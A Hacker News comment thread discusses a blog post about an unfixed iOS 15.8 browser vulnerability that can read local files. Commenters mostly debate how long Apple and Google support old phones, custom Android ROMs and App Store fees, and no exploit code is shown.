Hacker News new | past | comments | ask | show | jobs | submit login
No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability (joshua.hu)
359 points by akyuu 11 months ago | hide | past | favorite | 230 comments



Always a smile when I see my blog posted on hn:)

To answer three questions:

1) this was not reported in the context of any bug bounty[0], and the total conversation between me and Apple is 4 emails (1: hello do you plan to fix this? 2: can you reproduce this on the newest ios17? 3: no. 4: if you are able to reproduce it on ios17 let us know)

2) exfiltration is obviously possible, I’m not sure why I would even need to specify that any page is able to read its own contents using JavaScript

3) the iPhone 6s and 15.8 are still seemingly supported by Apple.

[0] and you won’t find me on any bug bounty websites except for where I try to get contact with humans, see https://joshua.hu/slack-is-broken-with-noscript


You didn’t answer the biggest question: being able to read /etc/passwd does not imply being able to read any of the sensitive files listed under “What files could somebody steal? Well, there’s always:”. Did you actually test any of those?


I only tested passwd at the time and I don’t currently have access to the 6s to test the other files. I can report back whenever I get access to that phone again.


Getting in touch with an human is generally "easy": getting in touch with an engineer isn't.

It's sad that one has to open a bug bounty request to get an engineer to look into an issue like the one you described in your linked blog post.


It,'s always a fun and interesting read when your posts hit HN.

How much time would you estimate goes into researching? And do you have any pointers for someone which want to dip their toes into this vast sea of exploration?


This wasn't really my "finding" per-se (the original vulnerability was from June, after all), it was just something that came into my eyes and I thought it would be interesting to discuss the implications and some perceptions I have based on it.

>And do you have any pointers for someone which want to dip their toes into this vast sea of exploration?

Can you expand on what you mean by this exactly? I got into security by accident when I was a child and have never followed any type of routine when it comes to learning.

Probably the only pointer that may help is: take something that you know and use often (some piece of software) and ask "what if?" or "why can't I or someone do X?" ¯\_(ツ)_/¯


> exfiltration is obviously possible, I’m not sure why I would even need to specify that any page is able to read its own contents using JavaScript

Things that are obvious to you may be non-obvious to other people, including the readers of your blog.


In the context of their blog post, it's assumed that the reader has some knowledge of web technologies — if you can print data to your own webpage, you can also exfiltrate it.

It's not reasonable to expect the author to explain _every_ underlying technology involved since that was likely not the scope of the post.


Welcome to HN, in as gentle a way possible I refute this statement

> Apple continues to support nearly-decade-old devices like the iPhone 6S, which and iOS 15.8 is still powering those devices, seemingly with official Apple support, with the latest update from October the 25th, which addressed some security vulnerabilities.

With: try to update your Apple Watch with a device running the latest iOS 16


https://ibb.co/fn84p09

This photo was taken the day the blog post was published.


And yet, I am still unable to update my Apple Watch with the latest iOS 16. iOS 17 is now required. iOS 17 is also required to rent a movie on my Apple TV.

So, to the author's assertion that "Apple does a good job supporting old hardware", they may give some security patches but interoperability between current and previous versions is seemingly deliberately broken.


I feel this is misleading as most iPhone users are totally aware that iPhone Models not running iOS 17 are not being actively updated.

The list is widely published: https://support.apple.com/guide/iphone/models-compatible-wit...

Any model more than 5 years old (Xr and Xs) are essentially not being updated and not secure. So an iPhone 1, 3, 5, 6, 7, 8 and X are all not secure and most people who use the iPhone are totally aware of this.

It's like writing an article that Windows 7 is insecure and Microsoft isn't patching it. This is essentially their policy in most cases.


This is about the browser, not the OS. The unique thing about apple is that they tie the browser to the OS. So you won't even get application updates, which is quite surprising for anyone that has ever touched a computer.

That is some Windows 98 nonsense right there.


I understand your point, but I just think the headline.... "No new iPhone? No secure iOS" is misleading, because iPhone xR and xS, iPhone 11, iPhone 12, iPhone 13 and iPhone 14 models are all not new iPhones, but they receive secure iOS updates. The headline suggests only brand new iPhones are secure, but when you click they are talking about deprecated devices more than 5 years old that most users know do not receive updates just like Microsoft/Android or any other vendor, Apple explicitly stated they won't update these devices and most users are aware of this fact.


IIRC the browser is a part of the system because the engine is used everywhere in the system. For a long time in iOS it was WebKit that rendered attributed strings for instance.


FYI that is exactly what Microsoft proclaimed back in the day.

Doesn't sound better today does it?

At least on Windows they didn't prevent you from installing a different browser.


Windows and Android both come with a "built-in" browser:

Windows still ships Internet Explorer for rendering some old components, although I think they are moving to Edge (chromium) based web view. I can't find a better source right now, but something to start with: https://www.reddit.com/r/Windows11/comments/11n79xc/why_does...

Android has a chromium based WebView that ships with the system and is updated via Play Store: https://www.techtarget.com/searchsecurity/definition/Android...


... yes, but they are decoupled from the actual browser. Which makes all the difference.

My 10 year old android phone still runs the latest versions of both Chrome and Firefox.

Androids WebView being on the play store even allows that part of the system to be updated independently of the OS.


I have been a developer and nerd since 25 years, and I always expected that Apple also patches some previous versions. E.g. around a week ago they released both iOS 17.2.1 and iOS 16.7.4: https://support.apple.com/en-us/HT201222

So why should I assume that latest iOS 16 isn't completely patched? I think it's a shame to say at least that Apple has no public policy of how which OS versions are supported and which are not, it's just guesswork. Whereas I definitely know how long Microsoft supports Windows versions, e.g. Windows 10 until October 14th, 2025: https://learn.microsoft.com/en-us/lifecycle/products/windows...


It's not completely patched. Stop assuming. I've always assumed that Apple or Google or Microsoft consider three factors for deprecated devices or software: 1. Severity of Issue, 2. Expected work required to fix issue, 3. Number of users involved

I think if something is a relatively easy fix and high severity that they will fix it. I don't think they view security updates as a tool to force people to buy new products. The low hanging fruit for large numbers of users gets fixed. The underlying software however, should not be trusted or viewed as secure.

Even though these applications are bundled with the operating system, they are probably separate code bases and if they believe the patch can be accomplished across the versions with minimal work like fixing the same line of code in the old version it probably goes out. If they have to do a major overhall of the old operating system and port the new browser version to the old software, it probably doesn't.


I’m pretty sure most iPhone users are unaware of which version of iOS they run.


Exactly my thought as well


This is addressed in the second paragraph of the article. The iPhone 6S had an OS update in October 2023 (iOS 15.8) which included a security fix for a different issue. The Chromium security issue was fixed in June 2023.


According to the link Xs is supported.


The parent comment says this - anything _older_ than XR or XS is no longer supported


> Any model more than 5 years old (Xr and Xs) are essentially not being updated and not secure. So an iPhone 1, 3, 5, 6, 7, 8 and X are all not secure and most people who use the iPhone are totally aware of this.

That reads very much like X's are not supported. The 2nd sentence even says it explicitly.


That was about the literal iPhone X (the letter X). The iPhone Xr and Xs (roman numeral 10) are still supported.


It’s made more confusing by the fact that the comment omits all the S models from the list of unsupported models (along with the iPhone 4 for some reason).

So at a glance one could assume that the XS is lumped in with the X just like the 6S is lumped in with the 6.


Sorry for my poor drafting. I agree with your comment.


/etc/passwd is the same on every device because it is in the system image, which is world readable. I don't think this exploit can be used to read the call history database as the author implies because it is outside of the sandbox profile.


It probably does let you grab cookies and browsing history from Chrome, though.


> probably

I wish the author included a full proof of concept


They provided a complete exploit. It's only about 50 lines long. If you want to know if it works with other files it's pretty trivial to see for yourself.


Yeah the author goes a bit far in their hypotheticals, straight into fantasy.

Also not sure I agree with the implication that Apple shouldn’t publish which vulnerabilities they’ve patched (the only logical conclusion because the alternative, patching every version in perpetuity, is unrealistic).


Apple, in my opinion, does a very good job of supporting old devices. Buying an iPhone and keeping it for 6 years is a great strategy and when amortising the cost of the phone over those 6 years, it's price competitive with Android.

I do wish legislators forced Apple and Google to give users a path to install an alternative OS on their device. That would enable old iPhones(and Androids) to have their lifetime extended further.


> I do wish legislators forced Apple and Google to give users a path to install an alternative OS on their device.

All Google phones allow installation of alternative OSes (and are pretty much the only phones that allow resigning the boot loader so they're still secure - which is why they're chosen by projects like GrapheneOS). Why do you think they need to be forced into anything? You can buy a Pixel right now and run an alternative OS.


I interpret their comment as suggesting that Apple should adopt a similar approach, and that Google, as a platform owner, should mandate this requirement for licensing Android™ (not AOSP) to other OEMs (I've had several phones whose bootloader couldn't be unlocked), and for this to be a practice enshrined by law for any other such companies that could operate in a similar position.


I think the biggest problem is in the alternative OS. Non-official OSes typically are unstable that I personally find not worth the time given phone is quite important piece of communication. As others have already mentioned, certain lines and brands, such as One Plus, Google Pixels, etc have unlockable bootloader so people are free to install custom OSes.


I've been installing alternative ROMs on my android phones for almost 15 years. Never did I have any stability issues, on the contrary: the community ROMs often did a much better job than the official ones in terms of battery management, etc.


Not trying to contradict what your say, but my experience from a few years ago was:

* If you don't use a super popular model, you would have very few choices for custom ROMs * Often custom ROMs are still at the mercy of original manufacturer for certain hardware support -- e.g. they need to release "base AOSP image" or something like that * Custom ROMs often had random things not working, e.g. NFC not functional or cell/WiFi signal weaker than stock ROM * Some come with certain crappy preinstalled apps. Sure you can remove them, but still annoying * Battling SafetyNet was a cat-and-mouse game which I gave up * Browsing xda-developers forum and following the latest reply of a 10-page, 200-post thread like back in the early 2000s was the only way to get updates of a certain ROM. OTA updates were mostly out of the question * ... and many more added to this

I don't know how much has changed, hopefully a lot. I don't doubt if you have a phone of a popular model, you can find a custom ROM that does not make compromises and is much cleaner and better than the stock ROM. But these days I simply don't have any time for tasking the risk and messing with these things and worry WiFi might not work in some cases.


Yeah I know some devices already support this, the point of forcing it via legislation would be for those that don't.

I think this is also the answer to "the app store question". It feels unfair to force Apple to change a core value proposition by forcing them to allow side loading, but in the spirit of "It's my device" it should be possible to install an OS that makes a different tradeoff e.g. Android


>Buying an iPhone and keeping it for 6 years is a great strategy and when amortising the cost of the phone over those 6 years, it's price competitive with Android.

What's stopping you from keeping your Android 6 years making it an event better value? Most people I know don't throw away their Androids after 3 years but keep them as long as iPhones. Basically until it breaks/dies. So far I don't know anyone who got hacked and suffered damages for using an Android that stopped getting updates.


Shorter patch cycles - at least historically, I haven't kept pace with the Android ecosystem. That said, with Android you can use a different OS and keep the device secured


Sure, but like I said, people don't throw away their phones once they get stop getting SW patches the same way they don't throw away their ancient Macbooks with glowing Apple logos just because Apple stopped pushing OS updates years ago, because most non-HN people have no idea what patches are and they keep their phone and laptop as long as it still works and the battery lasts.

Obsession with zero day patches and security hypochondria is mostly a HN/tech-workers thing as if they're under attack by state actors using Pegasus. The average joe doesn't care not is he very likely to be impacted, unless using Android Jellybean or something, since most malware in the wild out to get them is script kiddie level not state-actor level.

And anyway, someone correct me if I'm wrong, but from my knowledge and experience with Android security, most Android critical vulns that can impact the day to day security of the Average Joe are covered by updating Google Play services and Chrome or whatever browser you use as those are the main attack surfaces for (non state sponsored) malware based on what people do with their phones, and those services keep getting updates from Google long after the manufacturers stopped pushing OS updates.


> So far I don't know anyone who got hacked and suffered damages for using an Android that stopped getting updates.

That’s a “hope for the best” approach to security, for me it’d be irresponsible to recommend it to even friends and family.

But if you want to do it with knowledge of the potential problems — go for it. It’s your phone and your data.


Please don't twist my words. I never said anything about recommending such a lifestyle to people. All I said was, using older devices without SW support, is the reality for a lot of people if you care to leave the tech bubble and see what devices people actually use, especially the not well off ones. Yes, a lot of people keep using their older device and they haven't got hacked. How do you get them to stop using their older devices, if they're happy with them and see no obvious threat and don't want to buy a new one?

Here's a though exercise: Most people use their device for browsing the web and messaging people, right? So as long as you keep your Play Services, browser and messenger apps up to date, how will malware get to the outdated layers of your OS to PWN you? Especially that modern web browsers and Andorid use sandboxing for apps and web tabs. I'm talking about realistic documented scenarios from the wild that have happened and are likely to repeat again, not state actors or scenarios from research labs where they hack you through the firmware vulns of the baseband modem.

Like I said, I'm not recommending you still use unpatched devices, but the realistic risk from using an Andorid device that stopped getting updates a year or so is relatively minimal in practice, otherwise there would be mass hacks and credential thefts left and right on a daily basis considering how many unpatched Android phones are out there.


Not when you can load an OS like Calyx [0], GrapheneOS [1] or LineageOS [2]. In this context the iPhone ends up the true "hope for the best" option. The original Pixel / Pixel XL (2016.10.04) can still run the latest LineageOS with current patches [3].

[0] https://www.lineageos.org/ [1] https://grapheneos.org/ [2] https://calyxos.org/ [3] https://download.lineageos.org/devices/sailfish/changes


I was responding to the parent who recommended using unpatched, out of support Android.

People who’re comfortable (or can be bothered) installing alternative OSes on their phones have an entirely different view on device obsolescence. Statistically they’re also a rounding error in the total mobile-using population.


> Statistically they’re also a rounding error in the total mobile-using population.

Understood, but that has no bearing on the point being argued. You have no control over Apple IOS hardware after Apple stops supporting it. The fact that there is that "rounding error" is good for everyone as it is a force against closing that ecosystem which currently exists. It matters.


Well android patching after 3 years is pretty new thing compared to Apple policy. Apple was and is keeping security updates for very long time with major updates on top of that for iOS. Not knowing someone does not mean they will not be hacked or already has not been by downloading some app from the store.


Yes, Apple is supporting older devices, but has made my SE 2020 nearly unusable (slow as hell, horrible UI bugs when typing) after updating to iOS 17. Everything worked perfectly until then. It seems as though Apple wants me to buy a more expensive phone. A friend had the exact same problem and now upgraded to a newer model.


No real change is going to happen. Out of all the mobile phone users out there, likely no more than 0.1% will ever consider installing alternative OS on their phone, even if allowed by law. Just look at the size of the custom ROM community in Android and real world impact.


> After contacting Apple […]

I’d be very curious to see HOW they contacted Apple. Depending on if you’re reaching out to security or just filing a standard radar I’d expect a very different answer.

Also, was it reported to the WebKit team? If that is where the bug is, perhaps that’s who should be taking the report?


It can make a big difference who reads the ticket. I might see something come in and think oh yeah that'll take me 5 min to fix and I'll just do it, but if someone else unknowledgeable about the feature sees it, or a PM... it might get closed as won't fix at best or just rot for 10 years.


OP here. It was reported to product-security@apple.com.


This is a 10 year old phone, released in 2014. Edit. I was wrong, 2015, sorry


This bug touches nothing hardware specific. In alternative timeline where mobile OSes arent fisher price parodies of proper operating systems, they could push the same image to all iphones and have a proper hardware abstraction layer take care of the specific details.

There is nothing fundamentally incompatible about the last couple of generation of iphones. ARMv8 CPU, PowerVR derived GPU. If the mobile computing space weren't driven by greed, this would be a non issue.

A Sandy Bridge era intel machine deployed in 2011 is easily capable of running the latest Linux, BSD or win10. And in the case of the first two, I'd wager it will continue to be viable for the foreseeable future.


It’s not economical to support devices used by less than 1% of the user base. Linux only manages it because community members step up to support older architectures. And sometimes when no one steps up the architectures are removed.

- Linux dropping support for old graphics drivers (Nov 2023) - https://www.phoronix.com/news/Linux-Drop-Old-UMS-DRM-Infra

- Linux Kernel Developers Discuss Dropping A Bunch Of Old CPUs (Jan 2021) - https://www.phoronix.com/news/2021-Linux-Drop-Old-CPUs

Supporting all of these is work. It makes development of new features harder, because it has to account for quirks of older hardware. Older hardware is also harder to get in the hands of developers and harder to test on. That’s why Linux has dropped support for 386, 486, IA-64 and other architectures.

There’s no point saying trillion dollar corporation etc. It comes down to some basic fact - phones must be built with SoCs, that’s the easiest way. The PC way doesn’t work at scale. Now that we are on SoCs you have to draw the line on support somewhere. Just because the costs imposed on future development aren’t obvious to us doesn’t mean they don’t exist.

I think 5 years minimum (and sometimes more) of OS updates is pretty good, FWIW.


It’s absolutely economical. Apple only has to support a tiny number of devices that they themselves manufactured, they have the easiest job in the world.

Think about how many devices Microsoft has to support in Windows, it’s orders of magnitude more.

Apple doesn’t want to support older devices because they don’t see a benefit to themselves.

5 years of support is pitifully short. Pretty much everything I own lasts longer than 5 years, my phone is one of the things I have to replace most often, not because the hardware is broken, but because it stops receiving updates.


[flagged]


> New devices = New components = New Firmware = The updates have to stop sometime

So how does microsoft do it? My PC is about the same age yet it is still supported. And not even barely, but without a hitch.

> Apple is an OEM for most parts on their board, if upstream support ends for the components on the board then its game over as far as firmware updates goes.

But this is not an issue with a chip's firmware. Do you believe apple can't compile code for their 10 year old hardware or how do you think this happens?


>And its certainly NOT economical to keep stuff running forever. Look at OpenBSD and Theo famously begging for money to keep his basement of antique equipment running at enormous expense !

If OpenBSD can do it on a budget that's pocket change for Apple, with much more diverse hardware which they have no control over, then Apple definitely can do it.


Is it really bullshit? Lenovo manages hundreds of laptop models via fwupd, and those work just fine after they lose OEM support. I've got a Thinkpad from 2009 that still gets modern Linux patches (to say nothing of my 2006 PowerBook running Arch/Plasma 5).

Compared to what Apple makes off hardware and service revenue, the cost of opening iBoot and providing basic firmware support would be almost nothing. It's so economical that the volunteers at Asahi were capable of replacing the missing bits via black-box reverse engineering. You want to tell me that Apple is incapable of releasing that firmware themselves? On a technical forum?


> Compared to what Apple makes off hardware and service revenue

Really I wish people would wake up and stop with this bullshit.

Do the other manufacturers do anywhere near as much R&D as Apple does ? NO ! (2023: Lenovo 2bn vs Apple 29bn).

Do the other manufacturers maintain their own OS across multiple hardware platforms ? NO !

Its easy to sit in your armchair and spout crap about "well, Lenovo does it !". Well, the OS on your Lenovo is Windows or Linux. And the parts in your plastic Lenovo are almost certainly 100% off-the-shelf commodity parts.

Meanwhile Apple's R&D is what brings you, for example, the unmatched Apple Silicon chips, which everyone except the die-hard Apple bashers agree are genuinely industry leading.


Really, you've just proven my point. If Lenovo can support their hundreds/thousands of devices on a shoestring budget, Apple can support their few dozen devices easily. They've already written the device drivers and documented their non-commodity hardware, there's no technical reason it won't run other OSes.

I almost feel like you don't actually know what you're arguing against. An optionally-open bootloader is practically free to implement, and releasing driver code (or at least hardware docs) would mostly be an IP-related decision, not an effort-gated one. As-is, it feels like you're defending Apple's right to enforce petty limitations and be lazy with their trillion-dollar IP. It should be obvious why we (former Apple customers, some of us) disagree.


Lmao Apple R&D. Don't know what they're spending it on since they almost always adopt technologies that have already been developed + proven in the market.

So Apple Spends 29bn R&D every year, over many years and ends up developing...a really good version of (if not currently the best, sure) version of an ARM chip, a pre-existing architecture with which they are already intensely familiar? Wow, they're sure being real efficient with those funds.

I believe a lot of their performance gains pretty much just come down to larger die size than most ARM CPUs, making an SoC and colocating memory etc all on the same die, wrangling some of TMSC's newest most transistor dense and power efficient nodes. M1 Ultra=114b, 64 core graviton3=55b, hell people are even building stuff like https://www.jeffgeerling.com/blog/2023/everything-ive-learne....

Apple went for a bunch of easy wins tbh. Why doesn't every other computer manufacturer do it? Well Apple is a $1T company; they control so many aspects of their products, OS, software etc so very easy for them to offer this. It would require a concerted effort on the part of so many companies involved in the ecosystems of non-Apple products to make a transition the same way Apple did.


>It’s not economical to support devices used by less than 1% of the user base. Linux only manages it because community members step up to support older architectures. And sometimes when no one steps up the architectures are removed.

Again, bugs are this are not hardware specific. You are not supporting "devices". You are supporting the OS which all of them run. Ideally (I'm not familiar with OSX/iOS internals) all they have to do is push out an update that contains the newly fixed libwebkit.so or whatever. They control everything on their own platform so they don't even have to deal with glibc breaking backcompat like we have to in the GNU/Linux world.

If they can't figure out a way to make changes like this universal across devices, it's either deliberate negligence or incompetence.


You're a special kind of clown claiming that it is not economical white Apple profits are somewhere between 20% and 26%. They could build an update, they just prefer making more money.


Shrug. That's their problem. Or it should be, at least.

Don't sell crap you can't support for a decent amount of time. Stop ruining this planet we live on by creating immense amounts of e-waste every few years.

We both know your argument is dishonest or at least naive, though. They could easily support updates if they want to. But it's about money. This way they are forcing people to buy a new phone every few years. It's clever, shame about the planet.


> dishonest

Dishonest? You're saying I'm lying to support a trillion dollar corporation I have no financial stake in and never have? Is such an accusation really in the spirit of this forum?

I suggest you review the guidelines - https://news.ycombinator.com/newsguidelines.html

Don't be snarky. Don't sneer. Assume good faith.


I will say that certain comparisons (eg. "The PC way doesn’t work at scale") are objectively wrong. Even Apple uses the PC model internally, despite not having an open bootloader or really supporting UEFI anymore. AFAIK, the XNU kernel even uses the same DeviceTree layout as Linux for supporting ARM SOCs. Apple hasn't really broken any new ground that can't be re-covered by modern operating systems.

Also, your claim that it's "not economical" is entirely unproven and arguably false. iPhones are still architecturally supported by Linux and will continue to be for a while (even longer on BSD). Other Apple products (eg. Apple Silicon) received community driver support entirely from donations and volunteer time. There's no reason to assume that iPhones lack community interest, especially since Apple has never given the iPhone community the same leverage they had on Mac.

If that's the sum of both arguments, then you're mostly just leveraging FOMO to support an unproven concept. At best you're jumping the gun, at worst you're twisting the facts to preclude discussion of open iPhone software alternatives.


Apple still sells previous phones as lesser, but still not very affordable, models. The iPhone 7 was released in September 2016 and discontinued in September 2019. It is also on iOS 15.8 so presumably also vulnerable to this. That would be about 4 years of security updates. Not the worst but not beating what e.g. Google promises for Pixel phones now.


I looked it up, and the extended security updates for Google Pixel is only a recent change:

Pixel 8: released in 2023, updates through 2030 Pixel 5: released in 2020, stopped getting updates in October 2023.

https://support.google.com/pixelphone/answer/4457705?hl=en


Looks like I hit a 'sweet spot' with my Pixel 4a (released in August 2020, guaranteed updates until November 2023)


I use a Pixel 4a as a second phone and consider Google’s approach to be rubbish…

3 years worth of updates is pretty shit… my son’s iPhone 5c got updates for over 5 years (and I think there were some security issues they patched after that even)

At the moment I’ve got a perfectly usable Pixel 4a that I’m going to have to replace as it’s not secure enough for work related stuff anymore


You can't seriously give Apple shit for this and at the same time praise Google. iPhones have, pretty consistently since the 5 or so, received 5 or 6 years worth of OS updates since the phone's release whereas with Android phones you'll receive 2. Only after years of complaining is Google finally promising to support it for longer. And that doesn't cover Samsung, etc...


We can and should praise Google for improving things, and use their new strong points to push Apple into improving too.

This isn't a debate about what company is better. The word "now" is used for Google's promises for a reason.


> We can and should praise Google for improving things, and use their new strong points to push Apple into improving too.

Over a decade of Nexus then Pixel devices being flashable has not moved any needle of Apple doing the same. Google promising 7 years is in line with Apple's 10 year track record of providing 6-8 years of updates, so it's more like Google aligning with Apple, not Google pushing Apple.

Still, a vague† promise in a blog post or keynote address is not going to fit the bill, at the very least it should be in the EULA or other contractually enforceable document, otherwise the promise is worth nothing.

Ideally I wish software would be treated as with e.g automotive or washing machine manufacturers, who in the EU have a legal requirement to provide parts for 10 years.

† I mean the promise is clearly worded but bears no weight, especially when pitted against Google's track record over the last decade of making grand announcements then puling the rug down the road.


> We can and should praise Google for improving things

Let’s talk again in 5 years, once they had the opportunity to prove their plans. So far, it’s all just talk.


Especially that a 10 years old phone was very weak in terms of hardware, we haven’t reached a more plateaus era back then. It’s much easier to update a phone in the last 5 years for 10 years, than doing the same in a 5 years earlier window frame.


Never forget the Pixel Pass rug pull. I'll never buy another Google product.


But Android also lets you run custom builds, and my 2016 phone runs the latest OS. Sure not everyone does this, but unlike iOS I can take care of it myself.


> my 2016 phone runs the latest OS. Sure not everyone does this, but unlike iOS I can take care of it myself.

"not everyone" is an understatement.

That's a solution for you (and the dozens - dozens! - of people doing the same), in practice it is not for 99% of Android users, therefore, again in practice, there's a huge fleet of devices with out-of-date software out there.

> But Android also lets you run custom builds

That's not even counting that:

- many Android manufacturers make it non-trivial† to root/unlock/flash a build and/or make it blow a warranty fuse, and that's if it's even possible at all.

- usually the camera goes ape shit, and often loudspeaker audio quality too.

- unless you relock the bootloader it immediately compromises security and makes bootloader updates nontrivial as unlocking again clears the device.

Mind you, this is a fine, intellectually satisfying strategy for you and me to be able to flash open builds, but it's by and large an extremely fringe strategy, and it's been shown over a decade that it's staying that way.

† Often involving downloading random flashing tools from obscure forums, that run only on Windows, some of these being one shot and requiring to plug in magic numbers corresponding to your exact device, and if you screw it up the device is bricked (e.g Samsung). Or the unlocking is on a low-write-count chip and once you exceed that limit the device is bricked (e.g OnePlus). I know, I've been there, bricked a few, recovered only one through JTAG.


Does it really let you run custom builds when it zeroes out proprietary firmware blobs on many models, turning your fancy camera into a shitty basic one? Or what about the million proprietary blobs you would need for full functionality — will those also get patched?


> But Android also lets you run custom builds

Yes, but that is only one component of a modern phone. Basebands and system bootloaders, among other firmwares, don't receive updates. Those are regularly attacked.

It's good that they do but it's not enough.


I feel like the security update period should really be measured from the date of last "as new" sale, not date of original release.


Personally I don’t think Apple’s level of support is incredibly bad when you take a look at the used device market. Even with Apple’s famously high resale values, depreciation on smartphones is huge.

Don’t buy brand new old phones new from Apple, they’re a ripoff. If you buy either an iPhone 12 or 13 used for $250-350 you can basically plan on a $50 a year budget to have a smartphone that always has the latest OS judging by their expected remaining lifespans.

I think the big flaw with the status quo is e-waste more than cost to the consumer. I think an iPhone 6S or 7 are incredibly slow and outdated devices for today’s usage but in 5 years I don’t think we will be able to say the same thing about an iPhone 12 or 13. Smartphone hardware is far more mature now than it was even 6 generations deep into the iPhone product line.

We should be able to replace batteries for $20 and replace things like broken screens for not much more, and Apple should be enthusiastic about it considering how services are their bread and butter moving forward. Apple should be happy to produce fewer phones and keep more consumer dollars allocated toward the purchase of high margin digital goods.


> I don’t think we will be able to say the same thing about an iPhone 12 or 13

The wildcard here is local LLM use cases and any new hardware that increases their speed by orders of magnitude.


That’s not really a need for smartphone users. I can access an LLM on a website for free right now.

I also don’t see any indication that there will be impactful local LLM silicon at the smartphone scale anytime soon.


You can yes, but the rumor is that Apple is focusing on adding them directly to your device, and if they integrate it deeply in the OS, then it will require the chips to run it. I’m sure you will be able to run old devices but without the latest Siri for example.


Can I get a user replaceable battery instead?


I just want a glorified iPod from my old phone that won't get pwned at the airport.


I still use a 6s and a fist Gen. se, I won’t say they’re terribly slow. It’s the apps, the modern apps, that make the device too slow. If you use not so many, it works quite very well. The only downside that the OS is not updated any longer. Although I got a security update recently, weeks ago.


Not yet, I believe. Revenue from iPhone sales is still quite fundamental to Apple‘s success, it‘s more than triple the revenue from all services combined (not including Google‘s search engine deal).


>but still not very affordable, models

The 2020 SE is available from a wide variety of sources for 200USD (still new in box); it'll be supported until 2027. The 2022 SE is 400USD, supported until 2029.

By comparison the Android phones at this price point functionally went out of support 2 years before they even existed- not only is there zero support for them, but they ship with outdated OS versions to begin with. And no, "but I can go to XDA and get a shitty ROM at the cost of my camera" doesn't count as support.


You had a strong first paragraph, but your second is going too far. A Pixel 6a is $349 and supported until 2027. A galaxy A15 is $175 and supported until the end of 2028 or early 2029. The full feature updates don't go quite as far, but they're still offered for multiple years into the future.


Isn't pixel 6 when google stopped using qualcomm modems and now has terrible signal reception?


> Google promises

While Google promises, Apple actually has a decade long track record of updating older phones for 5 or more years. We don’t know if Google will actually follow through on their promises or the execs in charge in 5 years will feel differently. But I personally bet $1000 that the iPhone 13 will get 5 years of OS updates minimum.


Promising is easy - google can’t keep maintaining successful apps of theirs, let alone a whole phone.

I’ll believe it at 6 years in, maybe.


Google promises. I don’t believe their promises after what happened to Google Reader.


Apple: proven track record

Google: promises

you're being disingenuous


> Google: promises

Google is not promising this out of the goodness of their heart. They're just getting ahead of what the EU is planning to mandate [0], and doing that to get some good marketing while they're at it.

So, while Google's track record leaves a lot to be desired, in this, I think they'll keep their promise, either because they actually care, or because the EU will force them to. Either way, we, the end users, will benefit from it.

And this will apply to all electronic device makers. That's probably why Samsung also increased their updates policy to five years as well.

[0]: https://www.insideprivacy.com/cybersecurity-2/eu-publishes-d...

> "The requirements apply for the lifetime of a product or five years from its placement on the market, whichever is shorter."


>Google is not promising this out of the goodness of their heart. They're just getting ahead of what the EU is planning to mandate

If that was the case then why did Google exceed the requirement by 2 years? Additionally, Google is providing 7 years of OS upgrades and 7 years of security updates. Google could have easily just do what they did with the Pixel 7 and offer 3 years of OS upgrades and 5 years of security updates, thus, meeting these EU requirement of 5 years of updates. So to claim that Google offering an industry leading 7 years of OS upgrades and 7 years of security updates is not out of the "goodness of their heart" is being disingenuous IMO.


>Apple: proven track record >Google: promises

Do you really think the cost of the class action lawsuit and settlement and the bad publicity for not adhering to their 7 years of support would not exponentially exceed the cost of a team of engineers tasked with supporting updates for their Pixel phones?

As for "promises" - why hasn't any other OEM matched or exceeded Google? Apple should have been the first one to step up the very next day.


It was difficult to locate but I found a new iPhone 7 for sale for $92. Seems affordable.


Google doesn’t have enough e-fuses to update the pixel phones for seven years, the marketing department is incompetent and didn’t talk to literally the only engineers they should have.


Is there a reason you think most updates would even want to blow e-fuses, let alone need to?

And how many are there, then?


Does the Pixel 8 use e-fuses? I was under the impression that it used a stored rollback index to prevent OS rollbacks.


It's fine for a vendor to completely abandon 10 year old hardware but if you can still pay 30% App Store tax/pay for iCloud/etc, the security fixes should be backported as well. The current situation is charging full price for inferior (or maybe even dangerous) product: Apple wants to have its cake and eat it too.


I don't totally follow this argument. the 30% app store commission, iCloud subscription, etc. does not only fund security fixes for the OS and core services. I don't think the average consumer thinks that's what they're paying for either. waiving the fee for EOL'd devices would create a perverse incentive of its own.

I do wish apple would follow google's example and commit to a service lifetime upfront, but other than that, I don't object to their model. in practice, it vastly exceeds the level of support for any android phone other than the pixel 8, and we have yet to see whether google actually follows through on that.


Also it means that at some point, Apple would have to actively block some legacy devices from using iCloud, app store, apple music, any app with subscrpitions etc which would effectively make the device pretty useless.


Are you really saying Apple should actively break interoperability with old software?


They should stop charging 30% App Store tax for an inferior product at the very least.


App Store purchases aren't tied to a particular device; you can buy an app on an old device and keep using it when you get a newer device. Do you have a coherent, reasonable suggestion for how Apple could modify their business model without completely breaking it, or are you just desperate to shoehorn complaints about the App Store fees into the conversation?


Easy: offer a discount if purchase is made on an unsupported device, just like how grocery stores offer discounts for food that's about to expire.

I don't think there is a real concern about app store economics collapsing, the app marketplace business is very lucrative. We can see this in related cases: you can avoid certain iOS taxes by purchasing your subscriptions on the web: Twitter Blue is $11 on iOS and $8 on the web. Spotify used to be $12.99 for iOS sign-ups and $9.99 on the web.

Why should users pay full bundled iOS tax that supports security updates, if they are getting none?


> Why should users pay full bundled iOS tax that supports security updates,

I don't think I've ever seen someone express the expectation that Apple's App Store fees are for the purpose of supporting iOS development and maintenance. Mostly I've seen and heard the expectation that those fees are connected to running the App Store itself (payment processing, hosting, app review, etc.) and beyond that, vague profiteering. iOS itself isn't a subscription service, and Apple seems quite happy to sell you devices even if you don't spend money in the App Store. So you seem to be stretching a bit by attributing those fees to iOS maintenance and then turning around to say that unsupported iOS versions should get a discount on the fees for any services that still work.


Your purchases carry forward to newer devices, no? If nothing else, people would keep an older device just to make purchases and then install it on their newer iPhone.


They're not charging you, the user that 30%. They're charging the developer. Yes that does trickle down to you in the developer's pricing, but, in this instance, a phone no longer receiving security updates is not an inferior product from the point of view of the transaction in question.


15% for the vast majority of developers and apps FWIW.


Probably true, but is it the same for the vast majority of the app revenue? Quite possibly not.


Why exactly? Does petrol get cheaper for an old car that barely works?


What does this mean? The App Store fees are paid by the developers / vendors. Are you saying they should pay less proportionate to the number of times their apps are downloaded to older devices?


> What does this mean?

It means they’re shoehorning another issue into this discussion.


I think it’s a completely valid point. Apple is still making (potentially a lot) of money off these old devices yet isn’t willing to fully support them. It seems very unethical.


  > seems very unethical
I agree. Clearly Apple should do the only ethical thing and immediately ban all unsupported devices from new App Store purchases.

When Apple announces this (very ethical) policy change, I expect you to full-throatedly defend Apple from the mass shrieking cries of "but muh planned obsolescence!!" Right? Right?? ;-)

